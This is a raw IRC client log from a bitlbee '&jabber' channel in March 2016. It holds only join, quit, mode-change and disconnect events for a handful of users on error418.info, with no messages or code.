(turtleshow@error418.info) has joined &jabber 2016-03-05 18:47:20 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 19:17:09 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 19:17:09 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-05 19:17:24 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 19:52:13 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 19:52:13 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-05 19:52:25 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 20:09:33 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 20:26:55 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 20:43:29 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 20:53:52 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 21:09:58 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 21:40:41 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 22:30:08 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 22:40:03 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 22:47:07 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 22:47:07 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-05 22:47:20 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 23:34:16 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 23:39:30 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 23:56:28 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-06 00:05:28 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-06 00:20:45 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-06 00:58:12 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-06 01:14:14 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-06 02:39:58 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-06 02:39:58 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-06 02:40:08 - Mode &jabber [+h turtleshow] by localhost 2016-03-06 02:46:25 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-06 02:46:25 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-06 02:46:56 - Mode &jabber [+h turtleshow] by localhost 2016-03-06 03:00:14 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-06 03:06:10 - Mode &jabber [+v error406_] by localhost 2016-03-06 03:43:08 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-06 03:43:08 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-06 03:43:19 - Mode &jabber [+h turtleshow] by localhost 2016-03-06 04:51:14 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-06 04:51:14 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-06 04:51:25 - Mode &jabber [+h turtleshow] by localhost 2016-03-06 06:28:55 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-06 06:28:55 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-06 06:29:08 - Mode &jabber [+h turtleshow] by localhost 2016-03-06 07:49:42 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-06 07:49:42 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-06 07:49:53 - Mode &jabber [+h turtleshow] by localhost 2016-03-06 09:15:46 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-06 09:15:46 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-06 09:15:59 - Mode &jabber [+h turtleshow] by localhost 2016-03-06 10:44:15 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-06 10:44:15 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-06 10:44:27 - Mode &jabber [+h turtleshow] by localhost 2016-03-06 11:14:50 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-06 11:14:50 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-06 11:15:38 - Mode &jabber [+h turtleshow] by localhost 2016-03-06 11:15:47 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-06 11:15:47 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-06 11:16:23 - Mode &jabber [+h turtleshow] by localhost 2016-03-06 11:16:46 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-06 11:16:46 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-06 11:17:01 - Mode &jabber [+h turtleshow] by localhost 2016-03-06 11:22:07 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-06 11:22:07 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-06 11:22:19 - Mode &jabber [+h turtleshow] by localhost 2016-03-06 11:22:35 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-06 11:22:35 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-06 11:22:47 - Mode &jabber [+h turtleshow] by localhost 2016-03-06 12:02:52 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-06 12:25:19 - irc: disconnected from server 2016-03-06 17:27:57 > fsociety (whoami@localhost) has joined &jabber 2016-03-06 17:27:57 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-06 17:28:03 > error406_ (error406@error418.info) has joined &jabber 2016-03-06 17:28:03 > gunter (gunter@error418.info) has joined &jabber 2016-03-06 17:28:03 > landi (landi@error418.info) has joined &jabber 2016-03-06 17:28:03 > jimk (jimk@error418.info) has joined &jabber 2016-03-06 17:28:03 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-06 17:28:03 > heeroyuy (heeroyuy@error418.info) has joined &jabber 2016-03-06 17:28:03 > munin (munin@error418.info) has joined &jabber 2016-03-06 17:28:04 - Mode &jabber [+v error406_] by localhost 2016-03-06 17:28:04 - Mode &jabber [+h turtleshow] by localhost 2016-03-06 17:31:50 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-06 17:32:54 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-07 00:22:27 > fsociety (whoami@localhost) has joined &jabber 2016-03-07 00:22:27 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-07 00:22:33 > error406_ (error406@error418.info) has joined &jabber 2016-03-07 00:22:33 > gunter (gunter@error418.info) has joined &jabber 2016-03-07 00:22:33 > landi (landi@error418.info) has joined &jabber 2016-03-07 00:22:33 > jimk (jimk@error418.info) has joined &jabber 2016-03-07 00:22:33 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 00:22:33 > heeroyuy (heeroyuy@error418.info) has joined &jabber 2016-03-07 00:22:33 > munin (munin@error418.info) has joined &jabber 2016-03-07 00:22:33 - Mode &jabber [+h error406_] by localhost 2016-03-07 00:22:33 - Mode &jabber [+v turtleshow] by localhost 2016-03-07 00:53:51 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 00:53:51 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 00:53:52 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 01:00:23 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 01:00:23 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 01:00:40 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 01:11:40 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-07 01:55:58 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 01:55:58 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 01:56:29 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 02:12:33 < error406_ (error406@error418.info) has quit (Leaving...) 2016-03-07 02:12:33 > error406_ (error406@error418.info) has joined &jabber 2016-03-07 03:22:17 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 03:22:17 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 03:22:25 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 05:19:01 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 05:19:01 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 05:19:17 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 06:15:01 > fsociety (whoami@localhost) has joined &jabber 2016-03-07 06:15:01 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-07 06:15:07 > error406_ (error406@error418.info) has joined &jabber 2016-03-07 06:15:07 > gunter (gunter@error418.info) has joined &jabber 2016-03-07 06:15:07 > landi (landi@error418.info) has joined &jabber 2016-03-07 06:15:07 > jimk (jimk@error418.info) has joined &jabber 2016-03-07 06:15:07 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 06:15:07 > heeroyuy (heeroyuy@error418.info) has joined &jabber 2016-03-07 06:15:07 > munin (munin@error418.info) has joined &jabber 2016-03-07 06:15:07 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 06:34:38 > fsociety (whoami@localhost) has joined &jabber 2016-03-07 06:34:38 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-07 06:34:43 > error406_ (error406@error418.info) has joined &jabber 2016-03-07 06:34:43 > gunter (gunter@error418.info) has joined &jabber 2016-03-07 06:34:43 > landi (landi@error418.info) has joined &jabber 2016-03-07 06:34:43 > jimk (jimk@error418.info) has joined &jabber 2016-03-07 06:34:43 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 06:34:43 > heeroyuy (heeroyuy@error418.info) has joined &jabber 2016-03-07 06:34:43 > munin (munin@error418.info) has joined &jabber 2016-03-07 06:34:43 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 07:05:29 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-07 07:09:54 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-07 07:20:01 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 07:20:01 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 07:20:09 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 07:39:48 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 07:39:48 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 07:39:48 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 07:48:41 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-07 07:55:41 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-07 08:05:30 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 08:05:30 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 08:05:42 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 08:14:12 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-07 08:20:57 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-07 08:35:42 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 08:35:42 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 08:35:53 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:00:46 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:00:46 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:01:19 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:01:22 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:01:22 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:01:56 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:01:59 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:01:59 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:02:04 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:02:34 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:02:34 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:02:35 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:02:35 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:02:35 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:03:09 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:03:16 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:03:16 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:03:52 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:03:53 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:03:53 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:03:58 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:04:31 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:04:31 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:04:31 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:04:33 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:04:33 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:05:37 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:06:22 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:06:22 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:06:23 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:06:26 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:06:26 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:07:01 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:07:02 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:07:02 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:07:07 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:08:36 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:08:36 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:08:37 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:08:49 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:08:49 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:08:53 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:11:14 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:11:14 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:11:19 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:11:54 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:11:54 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:11:55 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:11:55 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:11:55 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:11:59 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:12:43 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:12:43 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:13:37 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:13:54 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:13:54 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:13:58 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:14:53 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:14:53 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:14:54 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:14:54 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:14:54 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:15:31 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:16:40 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:16:40 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:16:40 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:16:43 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:16:43 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:17:53 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:19:08 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 09:19:08 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 09:19:19 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 09:46:14 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-07 09:51:31 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-07 10:49:34 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 10:49:34 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 10:49:46 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 11:16:33 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-07 11:28:08 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-07 11:48:47 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-07 11:48:58 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-07 13:10:49 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-07 13:20:06 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-07 15:25:43 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 15:25:43 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 15:26:23 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 16:14:48 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 16:14:48 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 16:14:59 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 17:58:11 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 17:58:11 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 17:58:22 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 18:44:36 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 18:44:36 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 18:44:48 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 18:53:46 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-07 19:15:15 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-07 19:15:15 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-07 19:15:28 - Mode &jabber [+h turtleshow] by localhost 2016-03-07 19:16:50 - irc: disconnected from server 2016-03-08 08:33:58 > fsociety (whoami@localhost) has joined &jabber 2016-03-08 08:33:58 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-08 08:34:04 > error406_ (error406@error418.info) has joined &jabber 2016-03-08 08:34:04 > gunter (gunter@error418.info) has joined &jabber 2016-03-08 08:34:04 > landi (landi@error418.info) has joined &jabber 2016-03-08 08:34:04 > jimk (jimk@error418.info) has joined &jabber 2016-03-08 08:34:04 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-08 08:34:04 > heeroyuy (heeroyuy@error418.info) has joined &jabber 2016-03-08 08:34:04 > munin (munin@error418.info) has joined &jabber 2016-03-08 08:34:04 - Mode &jabber [+h turtleshow] by localhost 2016-03-08 10:23:59 - Mode &jabber [+h error406_] by localhost 2016-03-08 11:51:30 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-08 11:51:30 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-08 11:51:40 - Mode &jabber [+h turtleshow] by localhost 2016-03-08 12:51:45 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-08 13:06:58 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-08 14:17:43 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-08 14:26:01 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-08 15:04:03 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-08 15:04:03 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-08 15:04:41 - Mode &jabber [+h turtleshow] by localhost 2016-03-08 15:46:03 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-08 16:02:51 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-08 16:18:05 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-08 16:19:22 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-08 16:43:42 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-08 16:53:39 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-08 16:57:52 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-08 16:57:52 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-08 16:58:04 - Mode &jabber [+h turtleshow] by localhost 2016-03-08 17:13:32 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-08 17:54:14 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-08 17:54:14 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-08 17:54:25 - Mode &jabber [+h turtleshow] by localhost 2016-03-08 18:31:51 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-08 18:31:51 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-08 18:32:03 - Mode &jabber [+h turtleshow] by localhost 2016-03-08 18:49:26 > fsociety (whoami@localhost) has joined &jabber 2016-03-08 18:49:26 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-08 18:49:31 - irc: disconnected from server 2016-03-08 18:52:33 > fsociety (whoami@localhost) has joined &jabber 2016-03-08 18:52:33 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-08 18:52:40 > error406_ (error406@error418.info) has joined &jabber 2016-03-08 18:52:40 > gunter (gunter@error418.info) has joined &jabber 2016-03-08 18:52:40 > landi (landi@error418.info) has joined &jabber 2016-03-08 18:52:40 > jimk (jimk@error418.info) has joined &jabber 2016-03-08 18:52:40 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-08 18:52:40 > heeroyuy (heeroyuy@error418.info) has joined &jabber 2016-03-08 18:52:40 > munin (munin@error418.info) has joined &jabber 2016-03-08 18:52:40 - Mode &jabber [+v error406_] by localhost 2016-03-08 18:52:40 - Mode &jabber [+h turtleshow] by localhost 2016-03-08 19:00:33 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-08 19:11:00 < error406_ (error406@error418.info) has quit (Leaving...) 2016-03-08 19:11:00 > error406_ (error406@error418.info) has joined &jabber 2016-03-08 19:42:29 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-08 19:42:29 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-08 19:42:46 - Mode &jabber [+h turtleshow] by localhost 2016-03-08 19:58:12 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-08 20:37:32 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-08 21:01:43 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-08 21:04:17 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-08 21:26:08 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-08 21:26:08 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-08 21:26:19 - Mode &jabber [+h turtleshow] by localhost 2016-03-08 21:31:35 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-08 21:32:44 - irc: disconnected from server 2016-03-09 07:38:32 > fsociety (whoami@localhost) has joined &jabber 2016-03-09 07:38:32 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-09 07:38:38 > error406_ (error406@error418.info) has joined &jabber 2016-03-09 07:38:38 > gunter (gunter@error418.info) has joined &jabber 2016-03-09 07:38:38 > landi (landi@error418.info) has joined &jabber 2016-03-09 07:38:38 > jimk (jimk@error418.info) has joined &jabber 2016-03-09 07:38:38 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-09 07:38:38 > heeroyuy (heeroyuy@error418.info) has joined &jabber 2016-03-09 07:38:38 > munin (munin@error418.info) has joined &jabber 2016-03-09 07:38:38 - irc: disconnected from server 2016-03-09 08:24:24 > fsociety (whoami@localhost) has joined &jabber 2016-03-09 08:24:24 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-09 08:24:30 > error406_ (error406@error418.info) has joined &jabber 2016-03-09 08:24:30 > gunter (gunter@error418.info) has joined &jabber 2016-03-09 08:24:30 > landi (landi@error418.info) has joined &jabber 2016-03-09 08:24:30 > jimk (jimk@error418.info) has joined &jabber 2016-03-09 08:24:30 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-09 08:24:30 > heeroyuy (heeroyuy@error418.info) has joined &jabber 2016-03-09 08:24:30 > munin (munin@error418.info) has joined &jabber 2016-03-09 08:24:31 - Mode &jabber [+h turtleshow] by localhost 2016-03-09 08:30:40 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-09 08:30:40 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-09 08:30:48 - Mode &jabber [+h turtleshow] by localhost 2016-03-09 08:51:29 - Mode &jabber [+v error406_] by localhost 2016-03-09 08:52:12 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-09 09:00:33 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-09 09:03:08 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-09 09:05:42 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-09 09:15:44 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-09 09:15:44 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-09 09:15:52 - Mode &jabber [+h turtleshow] by localhost 2016-03-09 09:18:13 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-09 09:18:13 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-09 09:18:14 - Mode &jabber [+h turtleshow] by localhost 2016-03-09 09:27:35 < munin (munin@error418.info) has quit (bitlbee.localhost error418.info) 2016-03-09 09:27:35 < heeroyuy (heeroyuy@error418.info) has quit (bitlbee.localhost error418.info) 2016-03-09 09:27:35 < turtleshow (turtleshow@error418.info) has quit (bitlbee.localhost error418.info) 2016-03-09 09:27:35 < jimk (jimk@error418.info) has quit (bitlbee.localhost error418.info) 2016-03-09 09:27:35 < landi (landi@error418.info) has quit (bitlbee.localhost error418.info) 2016-03-09 09:27:35 < gunter (gunter@error418.info) has quit (bitlbee.localhost error418.info) 2016-03-09 09:27:35 < error406_ (error406@error418.info) has quit (bitlbee.localhost error418.info) 2016-03-09 18:48:48 - irc: disconnected from server 2016-03-09 21:25:59 > fsociety (whoami@localhost) has joined &jabber 2016-03-09 21:25:59 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-09 21:50:29 - irc: disconnected from server 2016-03-09 23:29:50 > fsociety (whoami@localhost) has joined &jabber 2016-03-09 23:29:50 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-09 23:38:03 - irc: disconnected from server 2016-03-09 23:38:05 > fsociety (whoami@localhost) has joined &jabber 2016-03-09 23:38:05 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-09 23:40:19 - irc: disconnected from server 2016-03-09 23:40:20 > fsociety (whoami@localhost) has joined &jabber 2016-03-09 23:40:20 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-09 23:40:44 - irc: disconnected from server 2016-03-09 23:41:14 > fsociety (whoami@localhost) has joined &jabber 2016-03-09 23:41:14 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-10 09:52:12 - irc: disconnected from server 2016-03-10 11:10:46 > fsociety (whoami@localhost) has joined &jabber 2016-03-10 11:10:46 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-10 21:09:58 > fsociety (whoami@localhost) has joined &jabber 2016-03-10 21:09:58 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-11 02:51:37 - irc: disconnected from server 2016-03-11 02:51:47 > fsociety (whoami@localhost) has joined &jabber 2016-03-11 02:51:47 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-11 21:29:07 - irc: disconnected from server 2016-03-12 15:23:58 > fsociety (whoami@localhost) has joined &jabber 2016-03-12 15:23:58 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-13 17:23:40 - irc: disconnected from server 2016-03-14 00:36:22 > fsociety (whoami@localhost) has joined &jabber 2016-03-14 00:36:22 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-14 00:39:17 - irc: disconnected from server 2016-03-14 14:29:28 > fsociety (whoami@localhost) has joined &jabber 2016-03-14 14:29:28 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 